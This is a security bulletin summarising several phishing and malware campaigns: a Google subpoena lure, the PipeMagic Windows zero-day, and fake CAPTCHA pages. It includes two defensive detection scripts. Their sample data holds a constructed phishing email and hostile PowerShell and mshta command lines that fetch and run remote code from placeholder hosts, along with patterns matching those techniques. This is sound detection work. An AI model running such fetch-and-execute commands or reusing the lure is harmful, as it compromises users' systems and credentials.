
Security Bulletin


George Sutton

Watch Out for This Sophisticated Phishing Email That Looks Like It's From Google

April 29th, 2025


Who:

A sophisticated phishing campaign has been identified, targeting Gmail users by impersonating official Google communications.


What:

Attackers are sending emails that appear to originate from no-reply@accounts.google.com, a legitimate Google address. These emails claim that Google has received a subpoena concerning the recipient's account and prompt users to click on a link leading to a fraudulent "support portal" hosted on sites.google.com. This portal is designed to harvest user credentials by mimicking Google's legitimate services.


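Because the bulletin notes that the sender address is a legitimate Google one, a sender-domain check alone does not separate this lure from real Google mail; what distinguishes it is a Google sender whose body links to a user-publishable host (sites.google.com) together with the subpoena wording. The following triage script is an added illustration of that check, not part of the bulletin or any Google tooling; the two sample messages are constructed for the example, and the path under sites.google.com is a placeholder.

```python
import email
import re
from email import policy, utils
from urllib.parse import urlparse

# Constructed sample modelled on the bulletin's description; not a real captured message.
SAMPLE_PHISH = """From: Google <no-reply@accounts.google.com>
To: user@example.com
Subject: Notice of legal process for your Google Account
Content-Type: text/plain; charset=utf-8

Google has received a subpoena requesting data from your Google Account.
You can review the case materials in the support portal:
https://sites.google.com/view/legal-support-portal-example/home
"""

# Constructed benign counterpart: same sender, but the link stays on accounts.google.com.
SAMPLE_BENIGN = """From: Google <no-reply@accounts.google.com>
To: user@example.com
Subject: Security alert
Content-Type: text/plain; charset=utf-8

A new sign-in was detected. Review activity at
https://accounts.google.com/signin/security
"""

URL_RE = re.compile(r"https?://[^\s<>\"']+")
# Google-owned hosts on which arbitrary users can publish their own pages.
USER_HOSTED_GOOGLE = {"sites.google.com"}
# Wording the bulletin associates with this lure.
LURE_TERMS = ("subpoena", "legal process", "support portal")


def sender_domain(msg):
    """Return the domain part of the From: address, lower-cased."""
    _, addr = utils.parseaddr(msg["From"] or "")
    return addr.rpartition("@")[2].lower()


def body_text(msg):
    """Return the text body (plain preferred, html as fallback) or ''."""
    body = msg.get_body(preferencelist=("plain", "html"))
    return body.get_content() if body is not None else ""


def link_hosts(text):
    """Extract the hostnames of every URL found in the text."""
    hosts = []
    for url in URL_RE.findall(text):
        host = urlparse(url).hostname
        if host:
            hosts.append(host.lower())
    return hosts


def triage(raw_message):
    """Score one raw RFC 822 message and return the findings and a verdict."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    text = body_text(msg)
    hosts = link_hosts(text)
    findings = []

    # Core signal: a google.com sender pointing the reader at user-hosted Google content.
    hosted = sorted({h for h in hosts if h in USER_HOSTED_GOOGLE})
    if sender_domain(msg).endswith("google.com") and hosted:
        findings.append(f"google sender links to user-hosted page: {hosted}")

    # Supporting signal: the legal-process wording used by the campaign.
    haystack = ((msg["Subject"] or "") + " " + text).lower()
    lures = [t for t in LURE_TERMS if t in haystack]
    if lures:
        findings.append(f"lure terms present: {lures}")

    if hosted and sender_domain(msg).endswith("google.com"):
        verdict = "suspicious"
    elif lures:
        verdict = "review"
    else:
        verdict = "clean"
    return {"sender": sender_domain(msg), "hosts": hosts, "findings": findings, "verdict": verdict}


if __name__ == "__main__":
    for label, raw in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(label, triage(raw))
```

The rule deliberately requires both the Google sender and the sites.google.com link before returning "suspicious": either alone is common in legitimate mail, and the lure wording on its own only earns a "review" so that a real legal notice is not silently dropped.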
Jake Geier

Phishing Campaigns Use Real-Time Checks to Validate Victim Emails Before Credential Theft



Security Brief: Phishing Campaigns Use Real-Time Validation for Credential Theft


Who: Threat actors employing advanced phishing techniques, tracked by Cofense and Ontinue. Related activity linked to clusters Storm-1811 and STAC5777.


What: A new tactic dubbed “precision-validating phishing” uses real-time email validation to display fake login pages only to verified, high-value email accounts. This approach improves success rates and evades detection by security tools. Additional phishing lures use file deletion notices to deliver malware or direct users to bogus Microsoft login pages. In a separate campaign, attackers used Microsoft Teams messages and Quick Assist for remote access and multi-stage compromise.


Impact:


Jake Geier

PipeMagic Trojan Exploits Windows Zero-Day Vulnerability to Deploy Ransomware



Who: A threat actor tracked as Storm-2460 exploited a Windows zero-day (CVE-2025-29824) using the PipeMagic trojan to deploy ransomware. Victims include IT, real estate, financial, software, and retail sectors across the U.S., Venezuela, Spain, and Saudi Arabia.


What: The vulnerability, a privilege escalation flaw in Windows Common Log File System (CLFS), was used to gain SYSTEM privileges. Attackers delivered encrypted ransomware payloads via a malicious MSBuild file and certutil, leveraging compromised third-party sites.


Impact: Systems were compromised to steal credentials (via LSASS dump) and encrypt files with ransomware linked to the RansomEXX family. Windows 11 version 24H2 is not affected. Microsoft has patched the flaw and urges immediate updates.


Action Needed:

  • Apply April 2025 Patch Tuesday updates.


Jake Geier

Widespread Fake CAPTCHA Campaign Delivering Malware



Who: Threat actors are compromising widely used websites across various industries, embedding a fake CAPTCHA challenge to deliver malware.


What: Victims visiting these compromised sites are presented with a CAPTCHA challenge or redirected to another site with instructions. This process triggers PowerShell code execution, leading to the installation of information-stealing malware. Affected sites include HEP2go (a physical therapy video site) and several auto dealership websites.


Impact: Users who interact with the fake CAPTCHA risk having their systems compromised by malware that can steal sensitive information. Arctic Wolf has implemented detections for this attack and urges users to remain cautious.

Recommendations:

  • Avoid websites with suspicious CAPTCHA challenges. If a CAPTCHA asks you to copy and paste a command into the Windows Run dialog, the site is likely compromised.


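The recommendation above describes the user-side tell (a command pasted into the Run dialog). On the endpoint, the same behaviour shows up as a PowerShell or mshta process whose parent is explorer.exe, the process that hosts the Run dialog, carrying arguments such as a hidden window, an encoded command or a remote fetch. The detector below is an added example written for this bulletin, not Arctic Wolf's detection content; the four process-creation records are constructed in a Sysmon-like field layout, and the http://example.invalid URLs are placeholders.

```python
import json
import re

# Constructed Sysmon-style process-creation records (Event ID 1 field names); not real telemetry.
SAMPLE_EVENTS = [
    {"ProcessId": 4312, "User": "CORP\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"iex (iwr 'http://example.invalid/verify.txt')\""},
    {"ProcessId": 4320, "User": "CORP\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell.exe"},
    {"ProcessId": 4400, "User": "CORP\\bob",
     "ParentImage": "C:\\Users\\bob\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c npm run build"},
    {"ProcessId": 4500, "User": "CORP\\carol",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/captcha.hta"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]  # one JSON record per line, as a log shipper emits

# Interpreters a Run-dialog paste typically lands in.
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# explorer.exe hosts the Run dialog, so it is the parent of anything launched from it.
RUN_DIALOG_PARENTS = {"explorer.exe"}

# Argument patterns that an interactive user almost never types but pasted lures rely on.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression"),
    (re.compile(r"\b(?:downloadstring|invoke-webrequest|iwr|curl)\b.*https?://", re.I), "remote content fetch"),
    (re.compile(r"\bmshta\b.*https?://", re.I), "mshta remote script"),
]


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (spawned_from_run_dialog, [argument findings]) for one record."""
    from_run = (basename(ev.get("ParentImage", "")) in RUN_DIALOG_PARENTS
                and basename(ev.get("Image", "")) in SHELL_IMAGES)
    cmd = ev.get("CommandLine", "")
    findings = [label for rx, label in SUSPICIOUS_ARGS if rx.search(cmd)]
    return from_run, findings


def detect(lines):
    """Alert only when both the Run-dialog parent and a suspicious argument are present."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        from_run, findings = score_event(ev)
        if from_run and findings:
            alerts.append({"ProcessId": ev["ProcessId"], "User": ev["User"],
                           "CommandLine": ev["CommandLine"], "reasons": findings})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LINES):
        print(json.dumps(alert))
```

Requiring both conditions keeps the rule quiet for administrators who open an interactive PowerShell from Win+R (record 4320) and for build tools that spawn cmd.exe (record 4400), while the two pasted-lure shapes (hidden PowerShell fetching and evaluating remote text, and mshta pulling a remote .hta) are both caught.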